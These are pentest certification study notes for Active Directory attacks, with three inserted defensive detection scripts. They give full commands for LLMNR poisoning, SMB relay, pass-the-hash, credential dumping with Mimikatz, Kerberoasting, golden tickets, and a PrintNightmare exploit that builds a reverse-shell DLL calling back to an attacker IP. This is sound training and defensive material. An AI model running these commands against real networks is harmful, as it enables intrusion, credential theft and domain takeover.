PJPT Certification Notes

Overview

The PJPT certification is offered by TCM Security and comes with the Practical Ethical Hacking course. The course covers various topics from Active Directory to CVE exploitation through videos and quizzes.

Network Enumeration

Basic Network Scanning

# ARP scanning
sudo arp-scan -l
 
# Network discovery
netdiscover -r 192.168.5.0/24
 
# Comprehensive Nmap scans
nmap -T4 -p- -A 192.168.5.0/24
nmap -T4 -p- -A 192.168.5.1
nmap -T4 -p- -sS -sC 192.168.5.0/24

Active Directory Attacks

LLMNR Poisoning

  1. Capture NTLMv2 hashes using Responder:
sudo responder -I tun0 -dP
  2. Crack captured hashes:
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

SMB Relay Attack

Prerequisites: SMB signing must be disabled on target machines.

  1. Check SMB signing status:
nmap -p445 192.168.5.0/24 --script=smb2-security-mode
  2. Configure Responder:
sudo nano /etc/responder/Responder.conf
# Set:
# SMB = Off
# HTTP = Off
  3. Execute relay attack:
# For hash dumping
sudo ntlmrelayx.py -tf targets.txt -smb2support
 
# For interactive shell
sudo ntlmrelayx.py -tf targets.txt -smb2support -i
 
# For command execution
sudo ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"
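Added example (not part of the course notes): a small parser for the output of the `nmap -p445 --script=smb2-security-mode` check above, producing the list of hosts whose SMB signing is not required. That list is the remediation backlog for the SMB relay prerequisite: every host on it needs "Microsoft network server: Digitally sign communications (always)" enforced. The sample output is constructed to approximate nmap's normal-output format; any status line that does not end in "enabled and required" is treated as relay-exposed, so the third wording variant nmap may print is covered without depending on its exact text.

```python
import re
from dataclasses import dataclass
from typing import List

# Constructed sample approximating `nmap -p445 192.168.5.0/24 --script=smb2-security-mode`
# normal output; hosts and latencies are invented for this example.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 192.168.5.1
Host is up (0.00043s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required

Nmap scan report for 192.168.5.2
Host is up (0.00051s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required

Nmap scan report for 192.168.5.3
Host is up (0.00038s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode: 
|   2.1: 
|_    Message signing disabled and not required
"""


@dataclass
class SigningResult:
    host: str
    dialect: str
    status: str
    required: bool


HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
DIALECT_RE = re.compile(r"^\|\s+([\d.]+):\s*$")          # e.g. "|   3.1.1: "
STATUS_RE = re.compile(r"^\|_?\s+(Message signing .+?)\s*$")


def parse_smb_signing(nmap_output: str) -> List[SigningResult]:
    """Walk nmap normal output and collect one signing result per host."""
    results: List[SigningResult] = []
    host = None
    dialect = None
    for line in nmap_output.splitlines():
        m = HOST_RE.match(line)
        if m:
            host, dialect = m.group(1), None
            continue
        m = DIALECT_RE.match(line)
        if m:
            dialect = m.group(1)
            continue
        m = STATUS_RE.match(line)
        if m and host:
            status = m.group(1)
            # Only "enabled and required" blocks relay; everything else is flagged.
            results.append(SigningResult(host, dialect or "?", status,
                                         status.endswith("enabled and required")))
    return results


def relay_exposed_hosts(nmap_output: str) -> List[str]:
    """Hosts that accept unsigned SMB sessions, i.e. the hardening backlog."""
    return [r.host for r in parse_smb_signing(nmap_output) if not r.required]


if __name__ == "__main__":
    for r in parse_smb_signing(SAMPLE_NMAP_OUTPUT):
        print(f"{r.host:15} SMB {r.dialect:6} {'OK' if r.required else 'FIX'}  {r.status}")
```

Run it against a saved scan with `python3 smb_signing_audit.py < scan.txt` after swapping the constant for `sys.stdin.read()`; the `FIX` rows are the machines where ntlmrelayx would succeed.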

Shell Access Methods

PSExec

# Domain user
psexec.py test.local/fcastle:'Password1'@192.168.5.1
 
# Local user
psexec.py fcastle:'Password1'@192.168.5.1
 
# Pass-the-hash
psexec.py Administrator@192.168.5.1 --hashes [LM-hash]:[NTLM-hash]

WMIExec

wmiexec.py Administrator@192.168.5.1 --hashes [LM-hash]:[NTLM-hash]

SMBExec

smbexec.py test.local/fcastle:'Password1'@192.168.5.1

Metasploit PSExec

use exploit/windows/smb/psexec
set SMBDomain test.local
set SMBUser fcastle
set SMBPass Password1
set RHOSTS 192.168.5.2

IPv6 Attacks

When IPv6 is enabled on hosts but no IPv6 DNS server is configured for them:

  1. Start mitm6:
sudo mitm6 -d test.local
  2. Configure NTLM relay:
ntlmrelayx.py -6 -t ldaps://192.168.5.1 -wh fakewpad.test.local -l lootme

Results will be saved in /home/kali/lootme/domain_computers.html

Post-Compromise Enumeration

LDAP Domain Dump

sudo ldapdomaindump ldaps://192.168.5.1 -u 'test.local\fcastle' -p Password1
firefox domain_*.html

BloodHound

  1. Collect data:
sudo bloodhound-python -d test.local -u fcastle -p Password1 -ns 192.168.5.1 -c all
  2. Start services:
sudo neo4j console
sudo bloodhound

PlumHound

sudo python3 PlumHound.py --easy -p [PASSWORD]
sudo python3 PlumHound.py -x tasks/default.tasks -p [PASSWORD]

Post-Compromise Attacks

Pass-the-Hash

  1. Test credentials:
# With password
crackmapexec smb 192.168.5.0/24 -d test.local -u fcastle -p Password1
 
# With hash
crackmapexec smb 192.168.5.0/24 -d test.local -u administrator -H [HASH]
  2. Dump hashes:
# Using Secretsdump
secretsdump.py test.local/fcastle:Password1@192.168.5.2
 
# Using hash
secretsdump.py administrator@192.168.5.3 --hashes [LM-HASH]:[NT-HASH]

Kerberoasting

  1. Request SPN tickets:
python GetUserSPNs.py test.local/fcastle:Password1 -dc-ip 192.168.5.1 -request
  2. Crack tickets:
hashcat -m 13100 SPNs-hash.txt /usr/share/wordlists/rockyou.txt
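Added example (not from the course): detection logic for the Kerberoasting step above, run over Event ID 4769 (service ticket requested) records. A GetUserSPNs-style request shows up on the domain controller as RC4-HMAC (TicketEncryptionType 0x17) service tickets for user accounts, usually several SPNs from one requester in a short span. The sample events are constructed; field names follow the Security log schema, the threshold is an assumption to tune per environment.

```python
from collections import defaultdict
from typing import Dict, List

# Constructed sample Event ID 4769 records; values are invented for this example.
SAMPLE_4769_EVENTS: List[Dict[str, str]] = [
    {"TargetUserName": "fcastle@TEST.LOCAL", "ServiceName": "SQLService",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:192.168.5.50", "Status": "0x0"},
    {"TargetUserName": "fcastle@TEST.LOCAL", "ServiceName": "HTTPService",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:192.168.5.50", "Status": "0x0"},
    # AES ticket for a machine account: normal traffic, must not be counted
    {"TargetUserName": "fcastle@TEST.LOCAL", "ServiceName": "WS01$",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:192.168.5.50", "Status": "0x0"},
    # TGT renewal against krbtgt: normal traffic
    {"TargetUserName": "pparker@TEST.LOCAL", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:192.168.5.60", "Status": "0x0"},
    # A single RC4 request: suspicious but below the default threshold
    {"TargetUserName": "pparker@TEST.LOCAL", "ServiceName": "SQLService",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:192.168.5.60", "Status": "0x0"},
]

RC4_HMAC = 0x17  # etype 23


def is_rc4_user_service_ticket(event: Dict[str, str]) -> bool:
    """True for a successful RC4 TGS request against a user (non-machine, non-krbtgt) SPN."""
    svc = event.get("ServiceName", "")
    if svc.endswith("$") or svc.lower() == "krbtgt":
        return False
    if event.get("Status", "0x0") != "0x0":
        return False
    return int(event.get("TicketEncryptionType", "0x0"), 16) == RC4_HMAC


def detect_kerberoasting(events: List[Dict[str, str]], min_services: int = 2) -> List[dict]:
    """Group RC4 service-ticket requests by (requester, source IP) and report
    requesters that pulled tickets for at least `min_services` distinct SPNs."""
    seen = defaultdict(set)
    for ev in events:
        if is_rc4_user_service_ticket(ev):
            seen[(ev["TargetUserName"], ev["IpAddress"])].add(ev["ServiceName"])
    return [
        {"user": user, "ip": ip, "services": sorted(services)}
        for (user, ip), services in seen.items()
        if len(services) >= min_services
    ]


if __name__ == "__main__":
    for alert in detect_kerberoasting(SAMPLE_4769_EVENTS):
        print(f"possible Kerberoasting: {alert['user']} from {alert['ip']} -> {alert['services']}")
```

Accounts that still lack AES keys produce RC4 tickets legitimately, so baseline before alerting; the lasting fix for the crackable-ticket problem is long random passwords (or gMSA) on SPN accounts and AES-only Kerberos for them, which turns hashcat mode 13100 output into something that does not crack against rockyou.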

Token Impersonation

meterpreter > list_tokens -u
meterpreter > impersonate_token test\\administrator

Credential Dumping

Mimikatz

mimikatz(powershell) # privilege::debug
mimikatz(powershell) # lsadump::lsa /patch
mimikatz(powershell) # sekurlsa::logonPasswords

ProcDump

procdump.exe -accepteula -ma lsass.exe out.dmp
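Added example (not part of the notes) covering both the Mimikatz sekurlsa and the ProcDump steps above: both work by opening lsass.exe with read access to its memory, which Sysmon records as Event ID 10 (ProcessAccess). The filter below flags any source process that obtains PROCESS_VM_READ on lsass.exe unless it is on an allowlist. The Sysmon records and the allowlist entry are constructed for the example; build the real allowlist from a baseline of your own endpoints.

```python
from typing import Dict, List

# Constructed Sysmon Event ID 10 records; field names follow Sysmon's ProcessAccess schema.
SAMPLE_SYSMON_10: List[Dict[str, str]] = [
    {"SourceImage": r"C:\Tools\procdump.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"SourceImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    # Antivirus engine reading LSASS: expected, allowlisted below
    {"SourceImage": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18\MsMpEng.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    # Query-limited access only, no memory read
    {"SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    # Full access, but not to LSASS
    {"SourceImage": r"C:\Tools\procdump.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe", "GrantedAccess": "0x1FFFFF"},
]

PROCESS_VM_READ = 0x0010  # the bit both a minidump and sekurlsa need

# Hypothetical allowlist of binaries expected to read LSASS (lower-cased file names).
ALLOWLISTED_SOURCES = {"msmpeng.exe"}


def file_name(image_path: str) -> str:
    return image_path.rsplit("\\", 1)[-1].lower()


def reads_lsass_memory(event: Dict[str, str]) -> bool:
    """True when the access mask granted on lsass.exe includes PROCESS_VM_READ."""
    if file_name(event["TargetImage"]) != "lsass.exe":
        return False
    granted = int(event["GrantedAccess"], 16)
    return bool(granted & PROCESS_VM_READ)


def flag_lsass_access(events: List[Dict[str, str]]) -> List[str]:
    """Source images that read LSASS memory and are not allowlisted."""
    return [
        ev["SourceImage"]
        for ev in events
        if reads_lsass_memory(ev) and file_name(ev["SourceImage"]) not in ALLOWLISTED_SOURCES
    ]


if __name__ == "__main__":
    for src in flag_lsass_access(SAMPLE_SYSMON_10):
        print("LSASS memory read by", src)
```

Checking the VM_READ bit rather than matching the well-known masks (0x1010, 0x1FFFFF) keeps the rule from being bypassed by an unusual mask; the allowlist, not the mask, is where false positives get handled. Credential Guard or RunAsPPL on LSASS is the preventive control that makes both tools fail even when they run.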

Domain Privilege Escalation

# Create domain user
net user /add pentester "StrongPassword123!" /domain
 
# Add to Domain Admins
net group "Domain Admins" pentester /ADD /DOMAIN

Advanced Attacks

ZeroLogon

Warning: Can cause severe domain controller damage

Test for vulnerability:

git clone https://github.com/SecuraBV/CVE-2020-1472.git
cd CVE-2020-1472
python3 zerologon_tester.py DC-01 192.168.5.1

PrintNightmare

Remote Code Execution

  1. Check vulnerability:
rpcdump.py @192.168.5.3 | egrep 'MS-RPRN|MS-PAR'
  2. Execute attack:
# Create payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ATTACKER-IP> LPORT=5555 -f dll > shell.dll
 
# Share payload
smbserver.py share . -smb2support
 
# Execute exploit
python3 CVE-2021-1675.py test.local/f.castle:Password1@192.168.5.2 '\\<ATTACKER-IP>\share\shell.dll'

Local Privilege Escalation

Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare -DriverName "Xerox" -NewUser "pentester" -NewPassword "StrongPassword123!"

Domain Takeover Techniques

NTDS.dit Extraction

secretsdump.py test.local/fcastle:Password1@192.168.5.2 -just-dc-ntlm

Golden Ticket Attack

# In Mimikatz:
privilege::debug
lsadump::lsa /inject /name:krbtgt
kerberos::golden /User:Administrator /domain:test.local /sid:S-1-5-21-3311685201-1443070845-3622335404 /krbtgt:3f5f8614cf590401df166f81b87bf17 /id:500 /ptt
misc::cmd